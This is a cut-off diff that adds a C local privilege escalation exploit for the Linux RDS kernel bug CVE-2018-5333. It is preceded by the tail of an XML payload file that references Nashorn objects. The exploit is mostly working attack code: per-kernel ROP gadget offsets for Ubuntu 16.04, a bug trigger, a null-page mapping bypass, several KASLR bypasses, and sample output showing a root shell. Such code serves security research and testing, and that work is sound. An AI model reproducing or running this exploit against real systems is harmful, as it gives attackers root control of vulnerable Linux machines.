+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+</map>

data/exploits/CVE-2018-5333/cve-2018-5333.c

@@ -0,0 +1,883 @@
+// Local root exploit for Linux RDS rds_atomic_free_op NULL pointer dereference
+// in the rds kernel module in the Linux kernel through 4.14.13 (CVE-2018-5333).
+//
+// Includes KASLR, SMEP, and mmap_min_addr bypasses. No SMAP bypass.
+//
+// Targets:
+// - Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116
+// - Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54
+//
+// The rds kernel module is not loaded by default on Ubuntu, and is blacklisted
+// in /etc/modprobe.d/blacklist-rare-network.conf to prevent autoloading.
+// - install: sudo apt install "linux-image-extra-$(uname -r)-generic"
+// - load:    sudo insmod "/lib/modules/$(uname -r)/kernel/net/rds/rds.ko"
+//
+// This exploit is a modified extension of the original local root
+// proof of concept exploit written by wbowling as an example of using
+// CVE-2019-9213 to make previous kernel bugs exploitable:
+// - https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4
+//
+// The original exploit is based on the null pointer dereference
+// reproducer proof of concept and analysis by 0x36:
+// - https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+//
+// wbowling has done most of the hard work, by utilising Jann Horn's
+// mmap_min_addr bypass technique (CVE-2019-9213), allowing userland to mmap
+// virtual address 0 (without which this bug would not be exploitable on
+// systems with a sufficiently large value for vm.mmap_min_addr);
+// and developing the appropriate ROP chain.
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+//
+// This exploit adds offsets for additional kernels, and introduces some
+// additional features, such as KASLR bypasses and system checks, including:
+// - check if system supports SMAP
+// - check if system supports RDS sockets
+// - Jann Horn's mincore KASLR bypass via heap page disclosure (CVE-2017-16994)
+//   - https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+// - spender's /proc/kallsyms KASLR bypass (requires kernel.kptr_restrict=0)
+//   - https://grsecurity.net/~spender/exploits/exploit.txt
+// - xairy's syslog KASLR bypass (requires kernel.dmesg_restrict=0)
+//   - https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+// - lizzie's perf_event_open KASLR bypass (requires kernel.perf_event_paranoid<2)
+//   - https://blog.lizzie.io/kaslr-and-perf.html
+//
+// Shoutout to nstarke for adding additional kernel offsets.
+// - https://github.com/bcoles/kernel-exploits/pulls?q=author:nstarke+cve-2018-5333
+//
+// This exploit also uses various code patterns copied from:
+// - xairy's exploits:
+//   - https://github.com/xairy/kernel-exploits
+// - vnik's kernel ROP code:
+//   - https://github.com/vnik5287/kernel_rop
+// ---
+// $ gcc cve-2018-5333.c -o cve-2018-5333 -Wall
+// $ ./cve-2018-5333
+// Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)
+// [.] checking kernel version...
+// [.] kernel version '4.4.0-116-generic #140-Ubuntu' detected
+// [~] done, version looks good
+// [.] checking system...
+// [~] done, looks good
+// [.] mapping null address...
+// [~] done, mapped null address
+// [.] KASLR bypass enabled, getting kernel base address
+// [.] trying /proc/kallsyms...
+// [-] kernel base not found in /proc/kallsyms
+// [.] trying syslog...
+// [-] kernel base not found in syslog
+// [.] trying perf_event_open sampling...
+// [.] done, kernel text:   ffffffff9f000000
+// [.] commit_creds:        ffffffff9f0a4cf0
+// [.] prepare_kernel_cred: ffffffff9f0a50e0
+// [.] mmapping fake stack...
+// [~] done, fake stack mmapped
+// [.] executing payload 0x402119...
+// [+] got root
+// # id
+// uid=0(root) gid=0(root) groups=0(root)
+// ---
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-5333
+// <bcoles@gmail.com>
+
+#define _GNU_SOURCE
+
+#include <fcntl.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <linux/perf_event.h>
+#include <netinet/in.h>
+#include <sys/ioctl.h>
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/utsname.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define ENABLE_SYSTEM_CHECKS            1
+#define ENABLE_KASLR_BYPASS             1
+
+#if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN               0xffffffff00000000ul
+#  define KERNEL_BASE_MAX               0xffffffffff000000ul
+#  define ENABLE_KASLR_BYPASS_KALLSYMS  1
+#  define ENABLE_KASLR_BYPASS_SYSLOG    1
+#  define ENABLE_KASLR_BYPASS_PERF      1
+#  define ENABLE_KASLR_BYPASS_MINCORE   1
+#endif
+
+// Can be overwritten by argv[1]
+char *SHELL = "/bin/sh";
+
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled (1)
+unsigned long KERNEL_BASE = 0xffffffff81000000ul;
+
+// Will be overwritten by detect_versions().
+int kernel = -1;
+
+// kernel target struct, using ROP chain from wbowling's exploit
+struct kernel_info {
+  const char* kernel_version;
+  uint64_t commit_creds;
+  uint64_t prepare_kernel_cred;
+  uint64_t xor_rdi;     //: xor edi, edi ; ret
+  uint64_t mov_rdi_rax; //: mov rdi, rax ; pop rbx ; mov rax, rdi ; pop r12 ; pop rbp ; ret
+  uint64_t xchg_esp;    //: xchg eax, esp ; shr bl, 0xbf ; xor eax, eax ; pop rbp ; ret
+  uint64_t swapgs;      //: swapgs ; pop rbp ; ret
+  uint64_t iretq;       //: iretq
+};
+
+// Targets
+struct kernel_info kernels[] = {
+  { "4.4.0-21-generic #37-Ubuntu",   0xa21c0, 0xa25b0, 0x5d0c5, 0x178157, 0x3f8158, 0x64644, 0x4cc7da },
+  { "4.4.0-22-generic #40-Ubuntu",   0xa2220, 0xa2610, 0x5d0c5, 0x178217, 0x3f89e8, 0x64644, 0x7d005  },
+  { "4.4.0-24-generic #43-Ubuntu",   0xa2340, 0xa2730, 0x5d0c5, 0x178447, 0x3f98b8, 0x64644, 0x7d125  },
+  { "4.4.0-28-generic #47-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x178717, 0x3f9f38, 0x64644, 0x585dc  },
+  { "4.4.0-31-generic #50-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x1787a7, 0x3ffed8, 0x64644, 0x7d125  },
+  { "4.4.0-38-generic #57-Ubuntu",   0xa2570, 0xa2960, 0x5d0c5, 0x178a97, 0x400968, 0x64634, 0x7d1e5  },
+  { "4.4.0-42-generic #62-Ubuntu",   0xa25c0, 0xa29b0, 0x5d0c5, 0x178ac7, 0x400d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-98-generic #121-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x17a427, 0x40a138, 0x64694, 0x4b243  },
+  { "4.4.0-108-generic #131-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-109-generic #132-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-112-generic #135-Ubuntu", 0xa3a90, 0xa3e80, 0x5d0c5, 0x17b657, 0x40b238, 0x646a4, 0x54137c },
+  { "4.4.0-116-generic #140-Ubuntu", 0xa4cf0, 0xa50e0, 0x5e0c5, 0x17d5d7, 0x40ed08, 0x65734, 0x3a5b04 },
+
+  /* Untested:
+  { "4.4.0-51-generic #72-Ubuntu",   0xa2670, 0xa2a60, 0x5d0c5, 0x178cf7, 0x404d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-62-generic #83-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179747, 0x406a78, 0x64634, 0x7d1e5  },
+  { "4.4.0-63-generic #84-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-66-generic #87-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-70-generic #91-Ubuntu",   0xa27b0, 0xa2ba0, 0x5d0c5, 0x179847, 0x4070c8, 0x64664, 0x406eb  },
+  { "4.4.0-79-generic #100-Ubuntu",  0xa2800, 0xa2bf0, 0x5d0c5, 0x179a67, 0x408338, 0x64664, 0x7d235  },
+  { "4.4.0-87-generic #110-Ubuntu",  0xa2860, 0xa2c50, 0x5d0c5, 0x179ca7, 0x408768, 0x64694, 0x7d285  },
+  { "4.4.0-89-generic #112-Ubuntu",  0xa28a0, 0xa2c90, 0x5d0c5, 0x179d27, 0x408ae8, 0x64694, 0x7d265  },
+  { "4.4.0-96-generic #119-Ubuntu",  0xa28c0, 0xa2cb0, 0x5d0c5, 0x179e27, 0x409a48, 0x64694, 0x7d235  },
+  { "4.4.0-97-generic #120-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x179e47, 0x409a58, 0x64694, 0x4ed41  },
+  */
+
+  { "4.4.0-21-lowlatency #37-Ubuntu",   0xa3150, 0xa3560, 0x5e0c5, 0x17b2c7, 0x401288, 0x64d34, 0x7d95c },
+  { "4.4.0-22-lowlatency #40-Ubuntu",   0xa31c0, 0xa35d0, 0x5e0c5, 0x17b397, 0x401b48, 0x64d34, 0x7d9bc },
+  { "4.4.0-24-lowlatency #43-Ubuntu",   0xa32e0, 0xa36f0, 0x5e0c5, 0x17b5e7, 0x402958, 0x64d34, 0x7dadc },
+  { "4.4.0-28-lowlatency #47-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b8c7, 0x402f48, 0x64d34, 0x7dadc },
+  //{ "4.4.0-31-lowlatency #50-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409018, 0x64d34, 0x7dadc },
+  //{ "4.4.0-34-lowlatency #53-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409088, 0x64d34, 0x7dadc },
+  { "4.4.0-36-lowlatency #55-Ubuntu",   0xa3430, 0xa3840, 0x5e0c5, 0x17b9e7, 0x409318, 0x64d24, 0x7dacc },
+  { "4.4.0-38-lowlatency #57-Ubuntu",   0xa3500, 0xa3910, 0x5e0c5, 0x17bcb7, 0x409b38, 0x64d24, 0x4c030 },
+  { "4.4.0-42-lowlatency #62-Ubuntu",   0xa3560, 0xa3970, 0x5e0c5, 0x17bcf7, 0x409f68, 0x64d24, 0x7db6c },
+  { "4.4.0-98-lowlatency #121-Ubuntu",  0xa38c0, 0xa3cd0, 0x5e0c5, 0x17d737, 0x413408, 0x64d84, 0x24454 },
+  { "4.4.0-109-lowlatency #132-Ubuntu", 0xa5530, 0xa5940, 0x5f0c5, 0x17f257, 0x414c18, 0x65d94, 0x7f7ac },
+  { "4.4.0-112-lowlatency #135-Ubuntu", 0xa5bd0, 0xa5fe0, 0x5f0c5, 0x17f9a7, 0x415448, 0x65d94, 0x7f8dc },
+  { "4.4.0-116-lowlatency #140-Ubuntu", 0xa6e00, 0xa7210, 0x600c5, 0x1818f7, 0x418a38, 0x66de4, 0x809ef },
+
+  { "4.8.0-34-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-36-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-39-generic #42~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-41-generic #44~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-42-generic #45~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dea8, 0x642f4, 0x5c4f3 },
+  { "4.8.0-44-generic #47~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-45-generic #48~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-46-generic #49~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-49-generic #52~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-51-generic #54~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-52-generic #55~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-53-generic #56~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-54-generic #57~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-56-generic #61~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e278, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-58-generic #63~16.04.1-Ubuntu", 0xa5d20, 0xa6110, 0x5d0c5, 0x187797, 0x43dfa8, 0x642f4, 0x7ed5b },
+
+  { "4.8.0-34-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  { "4.8.0-36-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  //{ "4.8.0-39-lowlatency #42~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-41-lowlatency #44~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-42-lowlatency #45~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447428, 0x649f4, 0x4b3e3 },
+  { "4.8.0-44-lowlatency #47~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-45-lowlatency #48~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-46-lowlatency #49~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-49-lowlatency #52~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-51-lowlatency #54~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-52-lowlatency #55~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-53-lowlatency #56~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-54-lowlatency #57~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-56-lowlatency #61~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477f8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-58-lowlatency #63~16.04.1-Ubuntu", 0xa6ef0, 0xa7300, 0x5e0c5, 0x18aee7, 0x447568, 0x649f4, 0x7f932 },
+
+  //{ "4.10.0-14-generic #16~16.04.1-Ubuntu", 0xab610, 0xaba00, 0x600c5, 0x194ac7, 0x458288, 0x67764, 0x34c4b },
+  //{ "4.13.0-16-generic #19~16.04.3-Ubuntu", 0xa8220, 0xa85f0, 0x5f0c5, 0x19c8a7, 0x462d18, 0x668b4, 0x2f2d4 },
+  //{ "4.13.0-37-generic #42~16.04.1-Ubuntu", 0xab1d0, 0xab5a0, 0x610c5, 0x1a0827, 0x46bf58, 0x68944, 0x3381b },
+};
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+// https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+
+#define RAND_SIZE 4096
+
+#ifndef SOL_RDS
+#  define SOL_RDS 276
+#endif
+#ifndef RDS_CMSG_MASKED_ATOMIC_CSWP
+#  define RDS_CMSG_MASKED_ATOMIC_CSWP 9
+#endif
+#ifndef AF_RDS
+#  define AF_RDS 0x15
+#endif
+
+void trigger_bug()
+{
+  struct sockaddr_in sin;
+  struct msghdr msg;
+  char buf[RAND_SIZE];
+  struct cmsghdr cmsg;
+
+  memset(&sin, 0, sizeof(struct sockaddr));
+  memset(&msg, 0, sizeof(msg));
+  memset(buf, 0x40, sizeof(buf));
+  memset(&cmsg, 0, sizeof(cmsg));
+
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): %m\n");
+    return;
+  }
+
+  sin.sin_family = AF_INET;
+  sin.sin_port = htons(2000);
+  sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+
+  bind(fd, (struct sockaddr*)&sin, sizeof(sin));
+
+  cmsg.cmsg_len = RAND_SIZE;
+  cmsg.cmsg_type = RDS_CMSG_MASKED_ATOMIC_CSWP;
+  cmsg.cmsg_level = SOL_RDS;
+
+  memcpy(&buf[0], &cmsg, sizeof(cmsg));
+
+  *(uint64_t *)(buf + 0x18) = 0x40404000; /* args->local_addr */
+
+  msg.msg_name = &sin;
+  msg.msg_namelen = sizeof(sin);
+  msg.msg_iov = NULL;
+  msg.msg_iovlen = 0;
+  msg.msg_control = buf;
+  msg.msg_controllen = RAND_SIZE;
+  msg.msg_flags = MSG_DONTROUTE|MSG_PROXY|MSG_WAITALL;
+
+  sendmsg(fd, &msg, 0);
+}
+
+// * * * * * * * * * * * * * * map null address * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+
+void map_null() {
+  void *map = mmap((void *)0x10000, 0x1000, PROT_READ | PROT_WRITE,
+    MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (map == MAP_FAILED) {
+    dprintf("[-] mmap(null): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char* path = "/proc/self/mem";
+  int fd = open(path, O_RDWR);
+
+  if (fd == -1) {
+    dprintf("open(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long addr = (unsigned long)map;
+
+  while (addr != 0) {
+    addr -= 0x1000;
+    if (lseek(fd, addr, SEEK_SET) == -1) {
+      dprintf("lseek()\n");
+      exit(EXIT_FAILURE);
+    }
+    char cmd[1000];
+    sprintf(cmd, "LD_DEBUG=help su 1>&%d", fd);
+    system(cmd);
+  }
+}
+
+// * * * * * * * * * * * * * * * save state * * * * * * * * * * * * * * *
+// https://github.com/vnik5287/kernel_rop
+
+unsigned long user_cs, user_ss, user_rflags;
+
+static void save_state() {
+  asm(
+  "movq %%cs, %0\n"
+  "movq %%ss, %1\n"
+  "pushfq\n"
+  "popq %2\n"
+  : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory");
+}
+
+// * * * * * * * * * * * * * * SIGSEGV handler * * * * * * * * * * * * * *
+
+void handler(int signo, siginfo_t* info, void* vcontext) {}
+
+void debug_enable_sigsev_handler() {
+  struct sigaction action;
+  memset(&action, 0, sizeof(struct sigaction));
+  action.sa_flags = SA_SIGINFO;
+  action.sa_sigaction = handler;
+  sigaction(SIGSEGV, &action, NULL);
+}
+
+// * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * *
+
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+  int f = open(file, O_RDONLY);
+  if (f == -1)
+    return -1;
+  int bytes_read = 0;
+  while (1) {
+    int bytes_to_read = CHUNK_SIZE;
+    if (bytes_to_read > max_length - bytes_read)
+      bytes_to_read = max_length - bytes_read;
+    int rv = read(f, &buffer[bytes_read], bytes_to_read);
+    if (rv == -1)
+      return -1;
+    bytes_read += rv;
+    if (rv == 0)
+      return bytes_read;
+  }
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+static int check_env() {
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): RDS kernel module not loaded?\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char buffer[PROC_CPUINFO_LENGTH];
+  char* path = "/proc/cpuinfo";
+  int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+  if (length == -1) {
+    dprintf("[-] open/read(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  char* found = memmem(&buffer[0], length, "smap", 4);
+  if (found != NULL) {
+    dprintf("[-] SMAP detected, no bypass available\n");
+    exit(EXIT_FAILURE);
+  }
+
+  struct stat st;
+
+  if (stat("/dev/grsec", &st) == 0) {
+    dprintf("[!] Warning: grsec is in use\n");
+  }
+
+  if (stat("/proc/sys/lkrg", &st) == 0) {
+    dprintf("[!] Warning: lkrg is in use\n");
+  }
+
+  return 0;
+}
+
+struct utsname get_kernel_version() {
+  struct utsname u;
+  int rv = uname(&u);
+  if (rv != 0) {
+    dprintf("[-] uname()\n");
+    exit(EXIT_FAILURE);
+  }
+  return u;
+}
+
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+#define KERNEL_VERSION_SIZE_BUFFER 512
+
+void detect_versions() {
+  struct utsname u;
+  char kernel_version[KERNEL_VERSION_SIZE_BUFFER];
+
+  u = get_kernel_version();
+
+  if (strstr(u.machine, "64") == NULL) {
+    dprintf("[-] system is not using a 64-bit kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (strstr(u.version, "-Ubuntu") == NULL) {
+    dprintf("[-] system is not using an Ubuntu kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char *u_ver = strtok(u.version, " ");
+  snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u.release, u_ver);
+
+  int i;
+  for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+    if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {
+      dprintf("[.] kernel version '%s' detected\n", kernels[i].kernel_version);
+      kernel = i;
+      return;
+    }
+  }
+
+  dprintf("[-] kernel version '%s' not recognized\n", kernel_version);
+  exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+// https://grsecurity.net/~spender/exploits/exploit.txt
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+unsigned long get_kernel_addr_kallsyms() {
+  FILE *f;
+  unsigned long addr = 0;
+  char dummy;
+  char sname[256];
+  char* name = "startup_64";
+  char* path = "/proc/kallsyms";
+
+  dprintf("[.] trying %s...\n", path);
+  f = fopen(path, "r");
+  if (f == NULL) {
+      dprintf("[-] open/read(%s): %m\n", path);
+      return 0;
+  }
+
+  int ret = 0;
+  while (ret != EOF) {
+    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+    if (ret == 0) {
+      fscanf(f, "%s\n", sname);
+      continue;
+    }
+    if (!strcmp(name, sname)) {
+      fclose(f);
+      if (addr == 0)
+        dprintf("[-] kernel base not found in %s\n", path);
+      return addr;
+    }
+  }
+
+  fclose(f);
+  dprintf("[-] kernel base not found in %s\n", path);
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+int mmap_syslog(char** buffer, int* size) {
+  *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER): %m\n");
+    return 1;
+  }
+
+  *size = (*size / getpagesize() + 1) * getpagesize();
+  *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+  *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL): %m\n");
+    return 1;
+  }
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog_xenial(char* buffer, int size) {
+  const char* needle1 = "Freeing unused";
+  char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+  if (substr == NULL)
+    return 0;
+
+  int start = 0;
+  int end = 0;
+  for (start = 0; substr[start] != '-'; start++);
+  for (end = start; substr[end] != '\n'; end++);
+
+  const char* needle2 = "ffffff";
+  substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+
+  if (substr == NULL)
+    return 0;
+
+  char* endptr = &substr[16];
+  unsigned long addr = strtoul(&substr[0], &endptr, 16);
+
+  addr &= 0xfffffffffff00000ul;
+  addr -= 0x1000000ul;
+
+  if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+    return addr;
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog() {
+  unsigned long addr = 0;
+  char* syslog;
+  int size;
+
+  dprintf("[.] trying syslog...\n");
+
+  if (mmap_syslog(&syslog, &size))
+    return 0;
+
+  addr = get_kernel_addr_syslog_xenial(syslog, size);
+
+  if (!addr)
+    dprintf("[-] kernel base not found in syslog\n");
+
+  return addr;
+}
+#endif
+
+// * * * * * * * * * * * perf_event_open KASLR bypass * * * * * * * * * * *
+// https://blog.lizzie.io/kaslr-and-perf.html
+
+#if ENABLE_KASLR_BYPASS_PERF
+int perf_event_open(struct perf_event_attr *attr, pid_t pid, int cpu, int group_fd, unsigned long flags)
+{
+  return syscall(SYS_perf_event_open, attr, pid, cpu, group_fd, flags);
+}
+
+unsigned long get_kernel_addr_perf() {
+  int fd;
+  pid_t child;
+
+  dprintf("[.] trying perf_event_open sampling...\n");
+
+  child = fork();
+
+  if (child == -1) {
+    dprintf("[-] fork() failed: %m\n");
+    return 0;
+  }
+
+  if (child == 0) {
+    struct utsname self = {0};
+    while (1) uname(&self);
+    return 0;
+  }
+
+  struct perf_event_attr event = {
+    .type = PERF_TYPE_SOFTWARE,
+    .config = PERF_COUNT_SW_TASK_CLOCK,
+    .size = sizeof(struct perf_event_attr),
+    .disabled = 1,
+    .exclude_user = 1,
+    .exclude_hv = 1,
+    .sample_type = PERF_SAMPLE_IP,
+    .sample_period = 10,
+    .precise_ip = 1
+  };
+
+  fd = perf_event_open(&event, child, -1, -1, 0);
+
+  if (fd < 0) {
+    dprintf("[-] syscall(SYS_perf_event_open): %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  uint64_t page_size = getpagesize();
+  struct perf_event_mmap_page *meta_page = NULL;
+  meta_page = mmap(NULL, (page_size * 2), PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+
+  if (meta_page == MAP_FAILED) {
+    dprintf("[-] mmap() failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  if (ioctl(fd, PERF_EVENT_IOC_ENABLE)) {
+    dprintf("[-] ioctl failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+  char *data_page = ((char *) meta_page) + page_size;
+
+  size_t progress = 0;
+  uint64_t last_head = 0;
+  size_t num_samples = 0;
+  unsigned long min_addr = ~0;
+  while (num_samples < 100) {
+    /* is reading from the meta_page racy? no idea */
+    while (meta_page->data_head == last_head);;
+    last_head = meta_page->data_head;
+
+    while (progress < last_head) {
+      struct __attribute__((packed)) sample {
+        struct perf_event_header header;
+        uint64_t ip;
+      } *here = (struct sample *) (data_page + progress % page_size);
+      switch (here->header.type) {
+      case PERF_RECORD_SAMPLE:
+        num_samples++;
+        if (here->header.size < sizeof(*here)) {
+          dprintf("[-] size too small.\n");
+          if (child) kill(child, SIGKILL);
+          if (fd > 0) close(fd);
+          return 0;
+        }
+
+        uint64_t prefix;
+        if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+          prefix = here->ip & ~0xfffff;
+        } else {
+          prefix = here->ip & ~0xffffff;
+        }
+
+        if (prefix < min_addr) min_addr = prefix;
+        break;
+      case PERF_RECORD_THROTTLE:
